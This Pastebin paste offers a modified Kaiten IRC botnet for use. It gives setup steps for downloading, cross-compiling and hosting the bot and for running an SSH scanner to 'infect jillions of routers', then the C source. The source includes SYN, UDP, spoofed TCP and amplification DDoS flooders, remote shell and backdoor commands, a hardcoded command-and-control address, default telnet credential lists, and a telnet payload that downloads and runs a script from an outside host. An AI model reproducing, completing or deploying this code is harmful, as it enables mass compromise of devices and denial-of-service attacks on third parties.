Guest User

Untitled

a guest
Jun 22nd, 2017
1,978
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. qbot and mirai sucked, so here's kaiten v 6.6.6 will infect jillions of routers.
  2. To setup kaiten, follow the instructions
  3. Every line starting with a "-" is a command you enter in terminal
  4. Download kaiten.c from http://pastebin.com/7Spas23P
  5. -wget http://pastebin.com/raw/7Spas23P -O kaiten.c
  6. Next edit the file and change the settings to your IRC server, channel, and channel key.
  7. -nano kaiten.c
  8. scanner and bot modified by SynthMesc/Freak :D
  9. kaiten.c (I didn't create kaiten)
  10. Cross compile it to sh4, powerpc, mipsel, mips, and armv5l.
  11. Use this cross compiler (coded by yours truly): http://pastebin.com/87q15NWF
  12. -wget http://pastebin.com/raw/87q15NWF -O cc7.py
  13. -python cc7.py kaiten.c 0.0.0.0
  14. Where 0.0.0.0 is your servers IP
  15. Put the files in your htdocs or html directory of a server to host them.
  16. Next download the scanner
  17. -wget http://pastebin.com/raw/wTbbzSBV -O infect.py
  18. Remember to edit the wget line in the scanner (CTRL + F "bin.sh")
  19. Next install the dependencies
  20. -yum install python-paramiko
  21. Or
  22. -apt-get install python-paramiko
  23. Set some stuff on your servers so you don't get capped at 476 open SSH connections.
  24. -ulimit -n 99999
  25. -sysctl -w fs.file-max=100000
  26. Run heavyhidra
  27. -python infect.py 376 LUCKY x 0
  28. -python infect.py 376 B 113.53 1
  29. -python infect.py 376 ALL x lol
  30. Donate BTC: 1GbiMJNg9VLcMQp3eTdZo4URxE8X4Je7wJ/*******************************************************************************
  31. * This is a remake of Kaiten, hacked together from various versions scattered *
  32. * throughout cyberspace. New features include a variety of awesome shell one- *
  33. * liners, ability to upgrade the bot over http (via gcc or static binary), a *
  34. * feature called "HackPkg" that installs binaries without dependencies like *
  35. * wget or tftp, and more! Tip: run GETBB <tftp ip> first to get the most out *
  36. * of this bot (it will install to /var/bin, which is almost always writable). *
  37. * The LOCKUP command will kill telnetd and run a backdoor of your choice (for *
  38. * simplicity we assume you will run it on port 23). This bot is updated often,*
  39. * so check back frequently for new killer features and ddos tools. In memory *
  40. * of David Bowie, because he was an awesome musician and passed during the *
  41. * early development of this bot. By ShellzRuS and all the other developers *
  42. * that have worked on Kaiten over the last 20 years. *
  43. * *
  44. * "Hacking on kaiten is a right of passage" --Kod *
  45. *******************************************************************************
  46. * This is a IRC based distributed denial of service client. It connects to *
  47. * the server specified below and accepts commands via the channel specified. *
  48. * The syntax is: *
  49. * !<nick> <command> *
  50. * You send this message to the channel that is defined later in this code. *
  51. * Where <nick> is the nickname of the client (which can include wildcards) *
  52. * and the command is the command that should be sent. For example, if you *
  53. * want to tell all the clients with the nickname starting with N, to send you *
  54. * the help message, you type in the channel: *
  55. * !N* HELP *
  56. * That will send you a list of all the commands. You can also specify an *
  57. * astrick alone to make all client do a specific command: *
  58. * !* SH uname -a *
  59. * There are a number of commands that can be sent to the client: *
  60. * PAN <target> <port> <secs> = A SYN flooder *
  61. * TCP <target> <port> <time> <flags> <packetsize> <pollinterval> = A spoofed TCP flooder
  62. * STD <ip> <port> <time>. = A STD flooder *
  63. * UDP <target> <port> <secs> = An UDP flooder *
  64. * UNKNOWN <target> <secs> = Another non-spoof udp flooder *
  65. * HTTPFLOOD <url> <secs> = A HTTP flooder *
  66. * NTP <target> <ntp server> <secs> = an NTP dos flooder *
  67. * BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls
  68. * DNSAMP <IP> <port> <reflection file url> <threads> <time> = DNS amplification flooder
  69. * QUAKE3 <target IP> <target port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time> = A quake3 amplification flooder
  70. *
  71. * PROXYFLUX = Starts a TCP proxy tunnel to main server using netcat
  72. *
  73. * NICK <nick> = Changes the nick of the client *
  74. * SERVER <server> = Changes servers *
  75. * GETSPOOFS = Gets the current spoofing *
  76. * SPOOFS <subnet> = Changes spoofing to a subnet *
  77. * DISABLE = Disables all packeting from this bot *
  78. * ENABLE = Enables all packeting from this bot *
  79. * KILL = Kills the knight *
  80. * GET <http address> <save as> = Downloads a file off the web *
  81. * VERSION = Requests version of knight *
  82. * KILLALL = Kills all current packeting *
  83. * HELP = Displays this *
  84. * IRC <command> = Sends this command to the server *
  85. * SH <command> = Executes a command *
  86. * BASH <command> = Run a bash command *
  87. * ISH <command> = Interactive SH (via privmsg) *
  88. * SHD <command> = Daemonize command *
  89. * UPDATE <http://server/bot> = Update this bot *
  90. * HACKPKG <http://server/bin> = Install binary (no dependencies) *
  91. * INSTALL <http://server/bin> = Install binary (via wget) *
  92. * BINUPDATE <http://server/bin> = Update a binary (via wget) *
  93. * SCAN <nmap opts> = Call an nmap wrapper script *
  94. * GETSSH <http:serverdropbear> = Install dropbear, run on port 30022 *
  95. * RSHELL <ip port> = Equates to nohup nc ip port *
  96. * GETBB <tftp server> = Get a proper busybox (via tftp) *
  97. * LOCKUP <http://server/bin> = Kill telnet, install a backdoor! *
  98. * *
  99. * Remember, all these commands must be prefixed by a ! and the nickname that *
  100. * you want the command to be sent to (can include wildcards). There are no *
  101. * spaces in between the ! and the nickname, and there are no spaces before *
  102. * the ! *
  103. * *
  104. * - contem on efnet - Shellz&Kod&Freak/SynthMesc *
  105. *******************************************************************************/
  106. ////////////////////////////////////////////////////////////////////////////////
  107. // EDIT THESE //
  108. ////////////////////////////////////////////////////////////////////////////////
  109. #undef STARTUP // Start on startup?
  110. #undef IDENT // Only enable this if you absolutely have to
  111. #define FAKENAME "-bash" // What you want this to hide as
  112. #define CHAN "#tac0b3ll" // Channel to join
  113. #define KEY "swigityswag" // The key of the channel
  114. #define PREFIX "NiXnEt" // The NICK prefix
  115. #define SERVER_ADDR "64.137.205.150" //Fast-flux server address
  116. #define PROXY_PORT "6667" //Proxy port for fast-flux
  117. int numservers=1; // Must change this to equal number of servers down there
  118. char *servers[] = { // List the servers in that format, always end in (void*)0
  119. "update-server.dynu.net",
  120. (void*)0
  121. };
  122. ////////////////////////////////////////////////////////////////////////////////
  123. // STOP HERE! //
  124. ////////////////////////////////////////////////////////////////////////////////
  125. #include <stdarg.h>
  126. #include <errno.h>
  127. #include <stdio.h>
  128. #include <stdlib.h>
  129. #include <string.h>
  130. #include <sys/types.h>
  131. #include <sys/stat.h>
  132. #include <fcntl.h>
  133. #include <strings.h>
  134. #include <netinet/in.h>
  135. #include <unistd.h>
  136. #include <sys/time.h>
  137. #include <sys/socket.h>
  138. #include <signal.h>
  139. #include <arpa/inet.h>
  140. #include <netdb.h>
  141. #include <time.h>
  142. #include <sys/wait.h>
  143. #include <sys/ioctl.h>
  144. #include <poll.h>
  145. #include <stdint.h>
  146. #include <pthread.h>
  147. #include <netinet/ip.h>
  148. #include <netinet/udp.h>
  149. #include <dirent.h>
  150. #include <net/if.h>
  151.  
  152. #define MAX_PACKET_SIZE 8192
  153. #define PHI 0x9e3779b9
  154. #define PACKETS_PER_RESOLVER 25
  155.  
  156. #define CMD_IAC 255
  157. #define CMD_WILL 251
  158. #define CMD_WONT 252
  159. #define CMD_DO 253
  160. #define CMD_DONT 254
  161.  
  162. #define PAD_RIGHT 1
  163. #define PAD_ZERO 2
  164. #define PRINT_BUF_LEN 12
  165.  
  166. #define OPT_SGA 3
  167. #define SOCKBUF_SIZE 1024
  168.  
  169. #define NUMITEMS(x) (sizeof(x) / sizeof((x)[0]))
  170.  
  171. char *Telnet_Payload = "cd /tmp; rm *; wget http://browsersecurity.gq/update/bins.sh; chmod +x bins.sh; sh bins.sh; rm -f bins.sh\r\n\0";
  172.  
  173. char *Bot_Killer_Binarys[] = {
  174. "mips",
  175. "mips64",
  176. "mipsel",
  177. "sh2eb",
  178. "sh2elf",
  179. "sh4",
  180. "x86",
  181. "arm",
  182. "armv5",
  183. "armv4tl",
  184. "armv4",
  185. "armv6",
  186. "i686",
  187. "powerpc",
  188. "powerpc440fp",
  189. "i586",
  190. "m68k",
  191. "sparc",
  192. "x86_64",
  193. "jackmymips",
  194. "jackmymips64",
  195. "jackmymipsel",
  196. "jackmysh2eb",
  197. "jackmysh2elf",
  198. "jackmysh4",
  199. "jackmyx86",
  200. "jackmyarmv5",
  201. "jackmyarmv4tl",
  202. "jackmyarmv4",
  203. "jackmyarmv6",
  204. "jackmyi686",
  205. "jackmypowerpc",
  206. "jackmypowerpc440fp",
  207. "jackmyi586",
  208. "jackmym68k",
  209. "jackmysparc",
  210. "jackmyx86_64",
  211. "hackmymips",
  212. "hackmymips64",
  213. "hackmymipsel",
  214. "hackmysh2eb",
  215. "hackmysh2elf",
  216. "hackmysh4",
  217. "hackmyx86",
  218. "hackmyarmv5",
  219. "hackmyarmv4tl",
  220. "hackmyarmv4",
  221. "hackmyarmv6",
  222. "hackmyi686",
  223. "hackmypowerpc",
  224. "hackmypowerpc440fp",
  225. "hackmyi586",
  226. "hackmym68k",
  227. "hackmysparc",
  228. "hackmyx86_64",
  229. "b1",
  230. "b2",
  231. "b3",
  232. "b4",
  233. "b5",
  234. "b6",
  235. "b7",
  236. "b8",
  237. "b9",
  238. "b10",
  239. "b11",
  240. "b12",
  241. "b13",
  242. "b14",
  243. "b15",
  244. "b16",
  245. "b17",
  246. "b18",
  247. "b19",
  248. "b20",
  249. "busyboxterrorist",
  250. "DFhxdhdf",
  251. "dvrHelper",
  252. "FDFDHFC",
  253. "FEUB",
  254. "FTUdftui",
  255. "GHfjfgvj",
  256. "jhUOH",
  257. "JIPJIPJj",
  258. "JIPJuipjh",
  259. "kmymips",
  260. "kmymips64",
  261. "kmymipsel",
  262. "kmysh2eb",
  263. "kmysh2elf",
  264. "kmysh4",
  265. "kmyx86",
  266. "kmyarmv5",
  267. "kmyarmv4tl",
  268. "kmyarmv4",
  269. "kmyarmv6",
  270. "kmyi686",
  271. "kmypowerpc",
  272. "kmypowerpc440fp",
  273. "kmyi586",
  274. "kmym68k",
  275. "kmysparc",
  276. "kmyx86_64",
  277. "lolmips",
  278. "lolmips64",
  279. "lolmipsel",
  280. "lolsh2eb",
  281. "lolsh2elf",
  282. "lolsh4",
  283. "lolx86",
  284. "lolarmv5",
  285. "lolarmv4tl",
  286. "lolarmv4",
  287. "lolarmv6",
  288. "loli686",
  289. "lolpowerpc",
  290. "lolpowerpc440fp",
  291. "loli586",
  292. "lolm68k",
  293. "lolsparc",
  294. "RYrydry",
  295. "telmips",
  296. "telmips64",
  297. "telmipsel",
  298. "telsh2eb",
  299. "telsh2elf",
  300. "telsh4",
  301. "telx86",
  302. "telarmv5",
  303. "telarmv4tl",
  304. "telarmv4",
  305. "telarmv6",
  306. "teli686",
  307. "telpowerpc",
  308. "telpowerpc440fp",
  309. "teli586",
  310. "telm68k",
  311. "telsparc",
  312. "telx86_64",
  313. "TwoFacemips",
  314. "TwoFacemips64",
  315. "TwoFacemipsel",
  316. "TwoFacesh2eb",
  317. "TwoFacesh2elf",
  318. "TwoFacesh4",
  319. "TwoFacex86",
  320. "TwoFacearmv5",
  321. "TwoFacearmv4tl",
  322. "TwoFacearmv4",
  323. "TwoFacearmv6",
  324. "TwoFacei686",
  325. "TwoFacepowerpc",
  326. "TwoFacepowerpc440fp",
  327. "TwoFacei586",
  328. "TwoFacem68k",
  329. "TwoFacesparc",
  330. "TwoFacex86_64",
  331. "UYyuyioy",
  332. "x86_64",
  333. "XDzdfxzf",
  334. "xxb1",
  335. "xxb2",
  336. "xxb3",
  337. "xxb4",
  338. "xxb5",
  339. "xxb6",
  340. "xxb7",
  341. "xxb8",
  342. "xxb9",
  343. "xxb10",
  344. "xxb11",
  345. "xxb12",
  346. "xxb13",
  347. "xxb14",
  348. "xxb15",
  349. "xxb16",
  350. "xxb17",
  351. "xxb18",
  352. "xxb19",
  353. "xxb20",
  354. "1",
  355. "2",
  356. "3",
  357. "4",
  358. "5",
  359. "6",
  360. "7",
  361. "8",
  362. "9",
  363. "10",
  364. "11",
  365. "12",
  366. "13",
  367. "14",
  368. "15",
  369. "16",
  370. "17",
  371. "18",
  372. "19",
  373. "20",
  374. "bb",
  375. "busybotnet",
  376. "pppd",
  377. "pppoe",
  378. "wput",
  379. "B1",
  380. "B2",
  381. "B3",
  382. "B4",
  383. "B5",
  384. "B6",
  385. "B7",
  386. "B8",
  387. "B9",
  388. "B10",
  389. "B11",
  390. "B12",
  391. "B13",
  392. "B14",
  393. "B15",
  394. "B16",
  395. "B17",
  396. "B18",
  397. "B20"
  398. };
  399.  
  400. char *useragents[] = {
  401. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  402. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  403. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  404. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
  405. "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  406. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  407. "Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  408. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  409. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
  410. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  411. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  412. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  413. "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  414. "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  415. "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
  416. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  417. "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
  418. "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
  419. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
  420. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
  421. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",
  422. "Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
  423. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
  424. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  425. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
  426. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
  427. "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1",
  428. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
  429. "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
  430. "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
  431. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
  432. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  433. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
  434. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)",
  435. "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
  436. "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  437. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
  438. "Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre",
  439. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  440. "Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0",
  441. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
  442. "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
  443. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)",
  444. "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  445. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
  446. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
  447. "Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  448. "Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  449. };
  450.  
  451.  
  452.  
  453. char *Telnet_Usernames[] = {
  454. "telnet\0", //telnet:telnet
  455. "root\0", //root:root
  456. "admin\0", //admin:toor
  457. "user\0", //user:admin
  458. "login\0", //login:user
  459. "guest\0", //guest:guest
  460. "support\0" //support:login
  461. "root\0", //root:netgear1
  462. "root\0", //root:maxided
  463. "CISCO\0", //CISCO:CISCO
  464. "oracle\0", //oracle:oracle
  465. "tim\0", //tim:tim
  466. };
  467. char *Telnet_Passwords[] = {
  468. "telnet\0", //telnet:telnet
  469. "root\0", //root:root
  470. "toor\0", //admin:toor
  471. "admin\0", //user:admin
  472. "user\0", //login:user
  473. "guest\0", //guest:guest
  474. "login\0", //support:login
  475. "changeme\0", //(none):changeme
  476. "1234\0", //(none):1234
  477. "12345\0", //(none):12345
  478. "123456\0", //(none):123456
  479. "default\0", //(none):default
  480. "pass\0", //(none):pass
  481. "password\0", //(none):password
  482. "support\0", //(none):support
  483. "\0" //(none):(none)
  484. "maxided\0" //root:maxided
  485. "oracle\0", //oracle:oracle
  486. "tim\0", //tim:tim
  487. };
  488.  
  489. char* advances[] = {":", "user", "ogin", "name", "pass", "dvrdvs", (char*)0};
  490. char* fails[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", (char*)0};
  491. char* successes[] = {"busybox", "$", "#", "shell", "dvrdvs", (char*)0};
  492. char* advances2[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "busybox", "$", "#", (char*)0};
  493.  
  494. struct telstate_t {
  495. int fd;
  496. unsigned int ip;
  497. unsigned char state;
  498. unsigned char complete;
  499. unsigned char usernameInd; /* username */
  500. unsigned char passwordInd; /* password */
  501. unsigned char tempDirInd; /* tempdir */
  502. unsigned int tTimeout; /* totalTimeout */
  503. unsigned short bufUsed;
  504. char *sockbuf;
  505. };
  506.  
  507. extern int scanPid = 0;
  508.  
  509. int sock,changeservers=0;
  510. int *pids, csum=0, actualparent;
  511. char *server, *chan, *key, *nick, *ident, *user, disabled=0, execfile[256],dispass[256];
  512. //unsigned int *pids;
  513. unsigned long spoofs=0, spoofsm=0, numpids=0;
  514.  
  515. char *getBuild() { //get architecture
  516. #if defined(__x86_64__) || defined(_M_X64)
  517. return "x86_64";
  518. #elif defined(__i386) || defined(_M_IX86)
  519. return "x86_32";
  520. #elif defined(__ARM_ARCH_4T__) || defined(__TARGET_ARM_4T)
  521. return "ARM-4";
  522. #elif defined(__ARM_ARCH_5_) || defined(__ARM_ARCH_5E_)
  523. return "ARM-5"
  524. #elif defined(__ARM_ARCH_6_) || defined(__ARM_ARCH_6T2_)
  525. return "ARM-6";
  526. #elif defined(_mips__mips) || defined(__mips) || defined(__MIPS_) || defined(_mips)
  527. return "MIPS";
  528. #elif defined(__sh__)
  529. return "SUPERH";
  530. #elif defined(__powerpc) || defined(__powerpc_) || defined(_ppc_) || defined(__PPC__) || defined(_ARCH_PPC)
  531. return "POWERPC";
  532. #else
  533. return "UNKNOWN";
  534. #endif
  535. }
  536.  
  537. // Calculates the checksum of the ip header.
  538. unsigned short ccsum(unsigned short *ptr,int nbytes)
  539. {
  540. register long sum;
  541. unsigned short oddbyte;
  542. register short answer;
  543.  
  544. sum=0;
  545. while(nbytes>1) {
  546. sum+=*ptr++;
  547. nbytes-=2;
  548. }
  549. if(nbytes==1) {
  550. oddbyte=0;
  551. *((u_char*)&oddbyte)=*(u_char*)ptr;
  552. sum+=oddbyte;
  553. }
  554.  
  555. sum = (sum>>16)+(sum & 0xffff);
  556. sum = sum + (sum>>16);
  557. answer=(short)~sum;
  558. return(answer);
  559. }
  560. int strwildmatch(const char* pattern, const char* string) {
  561. switch(*pattern) {
  562. case '\0': return *string;
  563. case '*': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
  564. case '?': return !(*string && !strwildmatch(pattern+1, string+1));
  565. default: return !((toupper(*pattern) == toupper(*string)) && !strwildmatch(pattern+1, string+1));
  566. }
  567. }
  568. int Send(int sock, char *words, ...) {
  569. static char textBuffer[1024];
  570. va_list args;
  571. va_start(args, words);
  572. vsprintf(textBuffer, words, args);
  573. va_end(args);
  574. return write(sock,textBuffer,strlen(textBuffer));
  575. }
  576. int mfork(char *sender) {
  577. unsigned int parent, *newpids, i;
  578. if (disabled == 1) {
  579. Send(sock, "NOTICE %s :Unable to comply.\n", sender);
  580. return 1;
  581. }
  582. parent=fork();
  583. if (parent <= 0) return parent;
  584. numpids++;
  585. newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
  586. for (i=0;i<numpids-1;i++) newpids[i]=pids[i];
  587. newpids[numpids-1]=parent;
  588. free(pids);
  589. pids=newpids;
  590. return parent;
  591. }
  592. unsigned long getspoof() {
  593. if (!spoofs) return rand();
  594. if (spoofsm == 1) return ntohl(spoofs);
  595. return ntohl(spoofs+(rand() % spoofsm)+1);
  596. }
  597. void filter(char *a) { while(a[strlen(a)-1] == '\r' || a[strlen(a)-1] == '\n') a[strlen(a)-1]=0; }
  598. char *randstring(int length) {
  599. srand(time(NULL));
  600. char *charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
  601. size_t stringLen = 26*2+10+7;
  602. char *randomString;
  603.  
  604. randomString = malloc(sizeof(char) * (length +1));
  605.  
  606. if (!randomString) {
  607. return (char*)0;
  608. }
  609.  
  610. unsigned int key = 0;
  611.  
  612. for (int n = 0;n < length;n++) {
  613. key = rand() % stringLen;
  614. randomString[n] = charset[key];
  615. }
  616.  
  617. randomString[length] = '\0';
  618.  
  619. return randomString;
  620. }
  621.  
  622. void identd() {
  623. int sockname,sockfd,sin_size,tmpsock,i;
  624. struct sockaddr_in my_addr,their_addr;
  625. char szBuffer[1024];
  626. if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) return;
  627. my_addr.sin_family = AF_INET;
  628. my_addr.sin_port = htons(113);
  629. my_addr.sin_addr.s_addr = INADDR_ANY;
  630. memset(&(my_addr.sin_zero), 0, 8);
  631. if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) return;
  632. if (listen(sockfd, 1) == -1) return;
  633. if (fork() == 0) return;
  634. sin_size = sizeof(struct sockaddr_in);
  635. if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) exit(0);
  636. for(;;) {
  637. fd_set bla;
  638. struct timeval timee;
  639. FD_ZERO(&bla);
  640. FD_SET(tmpsock,&bla);
  641. timee.tv_sec=timee.tv_usec=60;
  642. if (select(tmpsock + 1,&bla,(fd_set*)0,(fd_set*)0,&timee) < 0) exit(0);
  643. if (FD_ISSET(tmpsock,&bla)) break;
  644. }
  645. i = recv(tmpsock,szBuffer,1024,0);
  646. if (i <= 0 || i >= 20) exit(0);
  647. szBuffer[i]=0;
  648. if (szBuffer[i-1] == '\n' || szBuffer[i-1] == '\r') szBuffer[i-1]=0;
  649. if (szBuffer[i-2] == '\n' || szBuffer[i-2] == '\r') szBuffer[i-2]=0;
  650. Send(tmpsock, "%s : USERID : UNIX : %s\n",szBuffer,ident);
  651. close(tmpsock);
  652. close(sockfd);
  653. exit(0);
  654. }
  655. long pow(long a, long b) {
  656. if (b == 0) return 1;
  657. if (b == 1) return a;
  658. return a*pow(a,b-1);
  659. }
  660. u_short in_cksum(u_short *addr, int len) {
  661. register int nleft = len;
  662. register u_short *w = addr;
  663. register int sum = 0;
  664. u_short answer =0;
  665. while (nleft > 1) {
  666. sum += *w++;
  667. nleft -= 2;
  668. }
  669. if (nleft == 1) {
  670. *(u_char *)(&answer) = *(u_char *)w;
  671. sum += answer;
  672. }
  673. sum = (sum >> 16) + (sum & 0xffff);
  674. sum += (sum >> 16);
  675. answer = ~sum;
  676. return(answer);
  677. }
  678. void get(int sock, char *sender, int argc, char **argv) {
  679. int sock2,i,d;
  680. struct sockaddr_in server;
  681. unsigned long ipaddr;
  682. char buf[1024];
  683. FILE *file;
  684. unsigned char bufm[4096];
  685. if (mfork(sender) != 0) return;
  686. if (argc < 2) {
  687. Send(sock, "NOTICE %s :GET <host> <save as>\n", sender);
  688. exit(0);
  689. }
  690. if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
  691. Send(sock, "NOTICE %s :Unable to create socket.\n", sender);
  692. exit(0);
  693. }
  694. if (!strncmp(argv[1],"http://",7)) strcpy(buf,argv[1]+7);
  695. else strcpy(buf,argv[1]);
  696. for (i=0;i<strlen(buf) && buf[i] != '/';i++);
  697. buf[i]=0;
  698. server.sin_family = AF_INET;
  699. server.sin_port = htons(80);
  700. if ((ipaddr = inet_addr(buf)) == -1) {
  701. struct hostent *hostm;
  702. if ((hostm=gethostbyname(buf)) == NULL) {
  703. Send(sock, "NOTICE %s :Unable to resolve address.\n", sender);
  704. exit(0);
  705. }
  706. memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
  707. }
  708. else server.sin_addr.s_addr = ipaddr;
  709. memset(&(server.sin_zero), 0, 8);
  710. if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
  711. Send(sock, "NOTICE %s :Unable to connect to http.\n", sender);
  712. exit(0);
  713. }
  714.  
  715. Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",buf+i+1,buf);
  716. Send(sock, "NOTICE %s :Receiving file.\n", sender);
  717. file=fopen(argv[2],"wb");
  718. while(1) {
  719. int i;
  720. if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  721. if (i < 4096) bufm[i]=0;
  722. for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
  723. for (d+=4;d<i;d++) fputc(bufm[d],file);
  724. goto done;
  725. }
  726. }
  727. done:
  728. Send(sock, "NOTICE %s :Saved as %s\n", sender,argv[2]);
  729. while(1) {
  730. int i,d;
  731. if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  732. if (i < 4096) bufm[i]=0;
  733. for (d=0;d<i;d++) fputc(bufm[d],file);
  734. }
  735. fclose(file);
  736. close(sock2);
  737. exit(0);
  738. }
  739. void getspoofs(int sock, char *sender, int argc, char **argv) {
  740. unsigned long a=spoofs,b=spoofs+(spoofsm-1);
  741. if (spoofsm == 1) Send(sock, "NOTICE %s :Spoofs: %d.%d.%d.%d\n", sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0]);
